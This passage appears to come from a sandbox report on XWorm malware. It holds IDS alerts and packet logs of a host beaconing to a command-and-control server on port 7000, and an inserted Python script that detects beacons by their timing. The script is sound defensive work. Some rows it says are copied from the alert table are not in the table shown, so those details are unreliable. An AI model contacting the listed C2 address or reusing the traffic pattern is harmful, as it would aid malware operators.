                    2025-01-03T14:09:21.484371+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:09:21.576018+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:09:21.580271+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:09:25.399402+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:09:25.403642+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:09:25.944410+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:09:25.944410+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:09:27.337864+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:09:27.338032+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:09:27.339604+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:09:27.344416+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:09:37.382583+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:09:37.388404+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:09:37.699959+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:09:37.704422+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:09:38.299166+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:09:38.304303+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:09:47.195629+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:09:47.197312+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:09:47.555250+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:09:47.558589+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:09:52.648936+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:09:52.650949+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:09:52.944630+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:09:52.946369+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:09:53.039248+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:09:53.044482+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:09:53.263432+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:09:55.941742+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:09:55.941742+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:10:02.589170+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:10:02.591056+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:10:03.048695+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:10:03.050258+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:10:03.141843+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:10:03.143437+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:10:13.195539+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:10:13.203880+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:10:13.322235+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:10:13.323976+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:10:13.415532+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:10:13.417056+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:10:22.664732+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:10:22.666304+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:10:24.610608+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:10:24.612694+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:10:25.942800+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:10:25.942800+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:10:34.711534+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:10:34.713528+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:10:34.809849+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:10:34.811492+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:10:34.903054+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:10:34.904303+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:10:34.995921+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:10:34.997326+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:10:35.088920+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:10:35.091153+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:10:45.120046+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:10:45.121619+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:10:45.213398+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:10:45.218478+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:10:45.310161+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:10:45.311654+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:10:45.403174+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:10:45.405751+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:10:50.826218+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:10:50.828802+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:10:50.920411+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:10:50.921759+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:10:51.013312+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:10:51.015010+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:10:51.106485+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:10:51.107738+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:10:55.246273+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:10:55.248291+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:10:55.942781+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:10:55.942781+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:10:56.325098+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:10:56.325098+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:10:59.308022+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:10:59.337165+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:11:00.870752+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:11:00.871460+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
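The inbound "XWorm CnC PING Command Inbound M2" alerts (SID 2852874) in the table above land almost exactly 30 seconds apart, and that fixed keep-alive cadence on a non-standard port (7000) is a property a detection can key on independently of the byte-pattern signature. The Python below is an added illustration, not part of the Joe Sandbox report or of any Suricata tooling: it parses a handful of rows copied from the alert table (pipe-delimited, same column order as the table), groups alerts per SID and 5-tuple, and measures the inter-arrival cadence of each flow. The thresholds (at least 4 alerts, at least 75% of gaps within 5% of the median period) are assumptions chosen for this example, as is the use of the median rather than the mean, which keeps the doubled PING at 14:10:55/14:10:56 from skewing the period estimate.

```python
"""Beacon-cadence check over Suricata alert rows (added example, not report code)."""
from collections import defaultdict, namedtuple
from datetime import datetime
from statistics import median

Alert = namedtuple("Alert", "ts sid signature severity src_ip src_port dst_ip dst_port proto")

# Rows copied from the Suricata alert table above: every inbound
# "XWorm CnC PING Command Inbound M2" alert (SID 2852874) plus one client
# check-in (SID 2852923) as a non-beaconing control. Column order:
# Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
ALERT_ROWS = """\
2025-01-03T14:07:45.119776+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:07:55.943481+0100 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:08:25.963366+0100 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:08:55.981477+0100 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:09:25.944410+0100 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:09:55.941742+0100 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:10:25.942800+0100 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:10:55.942781+0100 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:10:56.325098+0100 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
"""


def parse_alerts(text):
    """Parse pipe-delimited alert rows into Alert tuples.

    The '+0100' offset is parsed with %z so this works on any Python 3
    (fromisoformat only accepts the colon-less offset from 3.11 on).
    """
    alerts = []
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = [f.strip() for f in line.split("|")]
        if len(fields) != 9:
            raise ValueError(f"expected 9 columns, got {len(fields)}: {line!r}")
        fields[0] = datetime.strptime(fields[0], "%Y-%m-%dT%H:%M:%S.%f%z")
        alerts.append(Alert(*fields))
    return alerts


def cadence(times, tolerance=0.05):
    """Return (median gap in seconds, fraction of gaps within +/-tolerance of it).

    The median is robust to a single burst (two alerts a few hundred ms apart)
    that would drag a mean away from the true keep-alive period.
    """
    times = sorted(times)
    gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    med = median(gaps)
    regular = sum(1 for g in gaps if abs(g - med) <= tolerance * med)
    return med, regular / len(gaps)


def find_beacons(alerts, min_alerts=4, min_regular=0.75):
    """Group alerts per (SID, src, sport, dst, dport) and keep the periodic flows.

    Returns {key: (period_seconds, regular_fraction)} for every flow with at
    least min_alerts alerts whose gaps are mostly the same length.
    """
    by_flow = defaultdict(list)
    for a in alerts:
        by_flow[(a.sid, a.src_ip, a.src_port, a.dst_ip, a.dst_port)].append(a.ts)
    beacons = {}
    for key, times in by_flow.items():
        if len(times) < min_alerts:
            continue  # too few samples to call anything periodic
        med, frac = cadence(times)
        if frac >= min_regular:
            beacons[key] = (round(med, 1), round(frac, 2))
    return beacons


if __name__ == "__main__":
    for (sid, sip, sport, dip, dport), (period, frac) in find_beacons(parse_alerts(ALERT_ROWS)).items():
        print(f"SID {sid}: {sip}:{sport} -> {dip}:{dport} every {period}s ({frac:.0%} of gaps regular)")
```

Run against the rows above, the single client check-in is skipped for lack of samples and the server-side PING flow is reported with a 30.0 s period and 6 of 7 gaps regular; the one irregular gap is the 0.38 s between the two PINGs at 14:10:55 and 14:10:56. In production the same logic would be fed from Suricata's eve.json rather than a scraped table, and the period and tolerance would be tuned per signature, but the grouping key (SID plus 5-tuple) and the median-based period estimate carry over unchanged.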
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 3, 2025 14:07:00.570508957 CET | 49730 | 443 | 192.168.2.4 | 172.67.19.24
Jan 3, 2025 14:07:00.570538998 CET | 443 | 49730 | 172.67.19.24 | 192.168.2.4
Jan 3, 2025 14:07:00.570601940 CET | 49730 | 443 | 192.168.2.4 | 172.67.19.24
Jan 3, 2025 14:07:00.591351032 CET | 49730 | 443 | 192.168.2.4 | 172.67.19.24
Jan 3, 2025 14:07:00.591362953 CET | 443 | 49730 | 172.67.19.24 | 192.168.2.4
Jan 3, 2025 14:07:01.072931051 CET | 443 | 49730 | 172.67.19.24 | 192.168.2.4
Jan 3, 2025 14:07:01.073010921 CET | 49730 | 443 | 192.168.2.4 | 172.67.19.24
Jan 3, 2025 14:07:01.077982903 CET | 49730 | 443 | 192.168.2.4 | 172.67.19.24
Jan 3, 2025 14:07:01.077991009 CET | 443 | 49730 | 172.67.19.24 | 192.168.2.4
Jan 3, 2025 14:07:01.078263044 CET | 443 | 49730 | 172.67.19.24 | 192.168.2.4
Jan 3, 2025 14:07:01.131035089 CET | 49730 | 443 | 192.168.2.4 | 172.67.19.24
Jan 3, 2025 14:07:01.141375065 CET | 49730 | 443 | 192.168.2.4 | 172.67.19.24
Jan 3, 2025 14:07:01.187341928 CET | 443 | 49730 | 172.67.19.24 | 192.168.2.4
Jan 3, 2025 14:07:01.633932114 CET | 443 | 49730 | 172.67.19.24 | 192.168.2.4
Jan 3, 2025 14:07:01.633997917 CET | 443 | 49730 | 172.67.19.24 | 192.168.2.4
Jan 3, 2025 14:07:01.634056091 CET | 49730 | 443 | 192.168.2.4 | 172.67.19.24
Jan 3, 2025 14:07:01.650686026 CET | 49730 | 443 | 192.168.2.4 | 172.67.19.24
Jan 3, 2025 14:07:05.869640112 CET | 49731 | 7000 | 192.168.2.4 | 87.120.125.47
Jan 3, 2025 14:07:05.874458075 CET | 7000 | 49731 | 87.120.125.47 | 192.168.2.4
Jan 3, 2025 14:07:05.874562979 CET | 49731 | 7000 | 192.168.2.4 | 87.120.125.47
Jan 3, 2025 14:07:06.324534893 CET | 49731 | 7000 | 192.168.2.4 | 87.120.125.47
Jan 3, 2025 14:07:06.329504967 CET | 7000 | 49731 | 87.120.125.47 | 192.168.2.4
Jan 3, 2025 14:07:19.183005095 CET | 49731 | 7000 | 192.168.2.4 | 87.120.125.47
Jan 3, 2025 14:07:19.187800884 CET | 7000 | 49731 | 87.120.125.47 | 192.168.2.4
Jan 3, 2025 14:07:19.356985092 CET | 7000 | 49731 | 87.120.125.47 | 192.168.2.4
Jan 3, 2025 14:07:19.383878946 CET | 49731 | 7000 | 192.168.2.4 | 87.120.125.47
Jan 3, 2025 14:07:19.388684034 CET | 7000 | 49731 | 87.120.125.47 | 192.168.2.4
Jan 3, 2025 14:07:26.053811073 CET | 7000 | 49731 | 87.120.125.47 | 192.168.2.4
Jan 3, 2025 14:07:26.099967003 CET | 49731 | 7000 | 192.168.2.4 | 87.120.125.47
Jan 3, 2025 14:07:32.022135973 CET | 49731 | 7000 | 192.168.2.4 | 87.120.125.47
Jan 3, 2025 14:07:32.027098894 CET | 7000 | 49731 | 87.120.125.47 | 192.168.2.4
Jan 3, 2025 14:07:32.199336052 CET | 7000 | 49731 | 87.120.125.47 | 192.168.2.4
Jan 3, 2025 14:07:32.200994015 CET | 49731 | 7000 | 192.168.2.4 | 87.120.125.47
Jan 3, 2025 14:07:32.205818892 CET | 7000 | 49731 | 87.120.125.47 | 192.168.2.4
Jan 3, 2025 14:07:44.884918928 CET | 49731 | 7000 | 192.168.2.4 | 87.120.125.47
Jan 3, 2025 14:07:44.889780045 CET | 7000 | 49731 | 87.120.125.47 | 192.168.2.4
Jan 3, 2025 14:07:45.057720900 CET | 7000 | 49731 | 87.120.125.47 | 192.168.2.4
Jan 3, 2025 14:07:45.099874020 CET | 49731 | 7000 | 192.168.2.4 | 87.120.125.47
Jan 3, 2025 14:07:45.119776011 CET | 49731 | 7000 | 192.168.2.4 | 87.120.125.47
Jan 3, 2025 14:07:45.124532938 CET | 7000 | 49731 | 87.120.125.47 | 192.168.2.4
Jan 3, 2025 14:07:55.943480968 CET | 7000 | 49731 | 87.120.125.47 | 192.168.2.4
Jan 3, 2025 14:07:55.990519047 CET | 49731 | 7000 | 192.168.2.4 | 87.120.125.47
Jan 3, 2025 14:07:57.725306034 CET | 49731 | 7000 | 192.168.2.4 | 87.120.125.47
Jan 3, 2025 14:07:57.730151892 CET | 7000 | 49731 | 87.120.125.47 | 192.168.2.4
Jan 3, 2025 14:07:57.899616957 CET | 7000 | 49731 | 87.120.125.47 | 192.168.2.4
Jan 3, 2025 14:07:57.900945902 CET | 49731 | 7000 | 192.168.2.4 | 87.120.125.47
Jan 3, 2025 14:07:57.905721903 CET | 7000 | 49731 | 87.120.125.47 | 192.168.2.4
Jan 3, 2025 14:08:07.756355047 CET | 49731 | 7000 | 192.168.2.4 | 87.120.125.47
Jan 3, 2025 14:08:07.762268066 CET | 7000 | 49731 | 87.120.125.47 | 192.168.2.4
Jan 3, 2025 14:08:07.931512117 CET | 7000 | 49731 | 87.120.125.47 | 192.168.2.4
Jan 3, 2025 14:08:07.937369108 CET | 49731 | 7000 | 192.168.2.4 | 87.120.125.47
Jan 3, 2025 14:08:07.942197084 CET | 7000 | 49731 | 87.120.125.47 | 192.168.2.4
Jan 3, 2025 14:08:08.256393909 CET | 49731 | 7000 | 192.168.2.4 | 87.120.125.47
Jan 3, 2025 14:08:08.261279106 CET | 7000 | 49731 | 87.120.125.47 | 192.168.2.4
Jan 3, 2025 14:08:08.429734945 CET | 7000 | 49731 | 87.120.125.47 | 192.168.2.4
Jan 3, 2025 14:08:08.431252003 CET | 49731 | 7000 | 192.168.2.4 | 87.120.125.47
Jan 3, 2025 14:08:08.436053991 CET | 7000 | 49731 | 87.120.125.47 | 192.168.2.4
Jan 3, 2025 14:08:18.787636995 CET | 49731 | 7000 | 192.168.2.4 | 87.120.125.47
Jan 3, 2025 14:08:18.792474031 CET | 7000 | 49731 | 87.120.125.47 | 192.168.2.4
Jan 3, 2025 14:08:18.834656000 CET | 49731 | 7000 | 192.168.2.4 | 87.120.125.47
Jan 3, 2025 14:08:18.839473009 CET | 7000 | 49731 | 87.120.125.47 | 192.168.2.4
Jan 3, 2025 14:08:18.881438971 CET | 49731 | 7000 | 192.168.2.4 | 87.120.125.47
Jan 3, 2025 14:08:18.886223078 CET | 7000 | 49731 | 87.120.125.47 | 192.168.2.4
Jan 3, 2025 14:08:18.960692883 CET | 7000 | 49731 | 87.120.125.47 | 192.168.2.4
Jan 3, 2025 14:08:18.962532997 CET | 49731 | 7000 | 192.168.2.4 | 87.120.125.47
Jan 3, 2025 14:08:18.967334986 CET | 7000 | 49731 | 87.120.125.47 | 192.168.2.4
Jan 3, 2025 14:08:18.990848064 CET | 49731 | 7000 | 192.168.2.4 | 87.120.125.47
Jan 3, 2025 14:08:18.995594025 CET | 7000 | 49731 | 87.120.125.47 | 192.168.2.4
Jan 3, 2025 14:08:19.006355047 CET | 49731 | 7000 | 192.168.2.4 | 87.120.125.47
Jan 3, 2025 14:08:19.011183977 CET | 7000 | 49731 | 87.120.125.47 | 192.168.2.4
Jan 3, 2025 14:08:19.131551981 CET | 49731 | 7000 | 192.168.2.4 | 87.120.125.47
Jan 3, 2025 14:08:19.225075960 CET | 7000 | 49731 | 87.120.125.47 | 192.168.2.4
Jan 3, 2025 14:08:19.225960016 CET | 7000 | 49731 | 87.120.125.47 | 192.168.2.4
Jan 3, 2025 14:08:19.226166964 CET | 49731 | 7000 | 192.168.2.4 | 87.120.125.47
Jan 3, 2025 14:08:19.266690969 CET | 7000 | 49731 | 87.120.125.47 | 192.168.2.4
Jan 3, 2025 14:08:19.266872883 CET | 49731 | 7000 | 192.168.2.4 | 87.120.125.47
Jan 3, 2025 14:08:19.271687031 CET | 7000 | 49731 | 87.120.125.47 | 192.168.2.4
Jan 3, 2025 14:08:19.312128067 CET | 7000 | 49731 | 87.120.125.47 | 192.168.2.4
Jan 3, 2025 14:08:19.314165115 CET | 49731 | 7000 | 192.168.2.4 | 87.120.125.47
Jan 3, 2025 14:08:19.318886995 CET | 7000 | 49731 | 87.120.125.47 | 192.168.2.4
Jan 3, 2025 14:08:19.358606100 CET | 7000 | 49731 | 87.120.125.47 | 192.168.2.4
Jan 3, 2025 14:08:19.361315012 CET | 49731 | 7000 | 192.168.2.4 | 87.120.125.47
Jan 3, 2025 14:08:19.406749010 CET | 7000 | 49731 | 87.120.125.47 | 192.168.2.4
Jan 3, 2025 14:08:19.477694035 CET | 7000 | 49731 | 87.120.125.47 | 192.168.2.4
Jan 3, 2025 14:08:19.479640007 CET | 49731 | 7000 | 192.168.2.4 | 87.120.125.47
Jan 3, 2025 14:08:19.484831095 CET | 7000 | 49731 | 87.120.125.47 | 192.168.2.4
Jan 3, 2025 14:08:25.664558887 CET | 49731 | 7000 | 192.168.2.4 | 87.120.125.47
Jan 3, 2025 14:08:25.669495106 CET | 7000 | 49731 | 87.120.125.47 | 192.168.2.4
Jan 3, 2025 14:08:25.839736938 CET | 7000 | 49731 | 87.120.125.47 | 192.168.2.4
Jan 3, 2025 14:08:25.847863913 CET | 49731 | 7000 | 192.168.2.4 | 87.120.125.47
                    Jan 3, 2025 14:08:25.852660894 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:25.963366032 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:26.008635998 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:29.147136927 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:29.151952982 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:29.209532976 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:29.214330912 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:29.225193024 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:29.229939938 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:29.242178917 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:29.246936083 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:29.322721004 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:29.328176022 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:29.333012104 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:29.409394979 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:29.411983967 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:29.416729927 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:29.503592968 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:29.505485058 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:29.510258913 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:29.597018957 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:29.603255987 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:29.608057022 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:34.444206953 CET497317000192.168.2.487.120.125.47
